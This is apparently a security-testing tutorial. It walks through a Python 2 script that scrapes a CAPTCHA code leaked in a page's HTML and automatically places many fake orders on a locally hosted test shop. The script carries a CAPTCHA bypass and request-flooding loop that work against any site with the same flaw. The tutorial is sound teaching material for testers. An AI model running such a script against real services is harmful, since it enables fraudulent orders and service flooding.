Automating Stuff with Python
What is Automation?
The use of any machine or computer to perform your task efficiently and in very less time can be termed as automation.
Why do we need automated scripts?
Humans can do great stuff, but sometimes we are too lazy to perform some. For example, if I ask you to multiply 345*246 most of you people will open calculator in your devices to calculate the result, rather than using pen paper to solve it. So using automated scripts make our task easy and is less time consuming.
Ever wondered why do we need automated scripts is security testing?
If so then the answer to your question is here. While performing security testing you can across a task that needs to be done multiple times like placing 1 lakh orders to check that the application can be flooded with multiple request. Now, sitting and creating each and every request manually will be a very tough job. So, here we can use automated scripts to perform our job.
Why Python?
Python is a very powerful language containing many libraries. We can perform many powerful task using python and its libraries. So we do not need to write a lengthy code to perform a small task.
We have crafted a small web application having a feature of order placement.
The user need to select the quantity of item and then the user can place order.
Request
Response
Confirmation Page containing captcha
Request
Response
On filling the delivery address, phone number and solving captcha we can successfully place an order.
Application Challenge: Your task here is to place multiple orders near about say 100. How will you do this? I am sure you won’t be solving captcha yourself and filling the form each time. But yes you can write automated script to do this stuff.
Before starting with automation let’s have a look in the captcha code. The feature is protected by captcha. For automating order placement we need to crack this captcha. The captcha is 6 digit numeric code so brute forcing it will take a lot time. But wait, there is something fishy here.
Yeah, we got the captcha code in the HTML body. So we now can parse the HTML response and get this code which will now allow us to automate our stuff.
Let’s begin with the automation. We will follow below steps for automating.
- Writing code for option parser. We can use option parser to create options for our script.
- Writing code for using proxy, so the each and every request and response is passed and recorded in proxy.
- Writing code for performing GET or POST request.
- Writing code for parsing the response and getting captcha code from the response.
We can use below code for Option parser:
#Usage help summary
usage = "./%prog [] -p [proxy] "
usage += "\nExample: ./%prog -p localhost:8080 "
#Parser options
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",help="HTTP Proxy ")
(options, args) = parser.parse_args()
After setting the option parser we can write code for using proxy with the script.
#Proxy handler
def getProxy():
try:
proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
except(socket.timeout):
print("\tProxy timed out...\n\n")
sys.exit(1)
return proxy_handler
#Test proxy connection
def testProxy():
print("[+] Testing proxy @ %s..." % (options.proxy))
opener = urllib2.build_opener(getProxy())
try:
check = opener.open("http://www.google.com").read()
except:
check = 0
pass
if check >= 1:
print("\tProxy is found to be working...\n\n")
else:
print("\tProxy failed... Exiting!\n\n")
sys.exit(1)
Performing POST request
opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
#Request Sent to server containing Host, Request body and request headers
req=urllib2.Request(targetURL,data,headers={})
check = opener.open(req).read()
Now we have our basic work done. We have the script which can send request to the server and receive response from the server, option parser and proxy.
Our next task is to customize this script to perform our task. So we send below request to the server.
targetURL="http://127.0.0.1/blog/index.php" #Captcha Page url
data="margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1¶dise=1" #Request body for captcha page
respHTML = postServerResponse(cj, targetURL, data) #performing post request
Parse the response and get captcha code from it.
captcha=re.search("(php\?rand=)(\d+)",respHTML)
Now with this captcha code we will again send the post request to the server.
targetURL1="http://127.0.0.1/blog/checkout.php" #Captcha is submitted to this url
data1="margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1¶dise=1&address=sdassdce&phn="+str(rand)+"&city=sdcefv&state=rferv&captcha_code="+captcha.group(2) # request body for order placement
respHTML1= postServerResponse(cj, targetURL1, data1)
Parse the new response received to get the order id of the successful order placed.
if re.search("successfully",respHTML1):
id1=re.search("(order id )(\d+)",resp)
print "Order Placed successfully with order id: "+id1.group(2)
else:
print "Order Not Placed"
By combining all the modules we get below script:
#!/usr/bin/python
# Import Starts
import sys
import socket
import urllib
import re
import urllib2
import string
import time
import httplib
import random
from optparse import OptionParser
from cookielib import CookieJar
# Import Ends
#Usage help summary
usage = "./%prog [] -p [proxy] "
usage += "\nExample: ./%prog -p localhost:8080 "
#Parser options
parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",help="HTTP Proxy ")
(options, args) = parser.parse_args()
#Proxy handler
def getProxy():
try:
proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
except(socket.timeout):
print("\tProxy timed out...\n\n")
sys.exit(1)
return proxy_handler
#Test proxy connection
def testProxy():
print("[+] Testing proxy @ %s..." % (options.proxy))
opener = urllib2.build_opener(getProxy())
try:
check = opener.open("http://www.google.com").read()
except:
check = 0
pass
if check >= 1:
print("\tProxy is found to be working...")
else:
print("\tProxy failed... Exiting!")
sys.exit(1)
#Post data to server using POST request
def postServerResponse(cj, targetURL, data):
if options.proxy:
try:
opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
#Request Sent to server containing Host, Request body and request headers
req=urllib2.Request(targetURL,data,headers={})
check = opener.open(req).read()
return check
except:
print("\tProxy connection failed to remote target...")
sys.exit(1)
else:
try:
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
req=urllib2.Request(targetURL,data,headers={})
check = opener.open(req).read()
return check
except:
print("\tTarget connection failed, check your address...")
sys.exit(1)
#Try to Place Order
def placeOrder():
cj = CookieJar()
opener=urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
targetURL="http://127.0.0.1/blog/index.php" #Captcha Page url
targetURL1="http://127.0.0.1/blog/checkout.php" #Captcha is submitted to this url
data="margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1¶dise=1" #Request body for captcha page
respHTML = postServerResponse(cj, targetURL, data)
captcha=re.search("(php\?rand=)(\d+)",respHTML)
if captcha:
rand=random.randint(7000000000,9999999999)
data1="margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1¶dise=1&address=sdassdce&phn="+str(rand)+"&city=sdcefv&state=rferv&captcha_code="+captcha.group(2) # request body for order placement
respHTML1= postServerResponse(cj, targetURL1, data1)
resp=respHTML1
if re.search("successfully",respHTML1):
id1=re.search("(order id )(\d+)",resp)
print "Order Placed successfully with order id: "+id1.group(2)
else:
print "Order Not Placed"
else:
print "Captcha not found"
#Main function
def main():
# Check and connect proxy server if specified using -p argument
if options.proxy:
testProxy()
print("\n[+] Running Test...")
loop=input("Enter number of orders to be placed:")
for i in range(0,loop):
placeOrder()
print("\n[+] Automated Order Placement. Have fun!...")
if __name__ == "__main__":
main()
Below is the screenshot for script for placing 30 orders:
References:
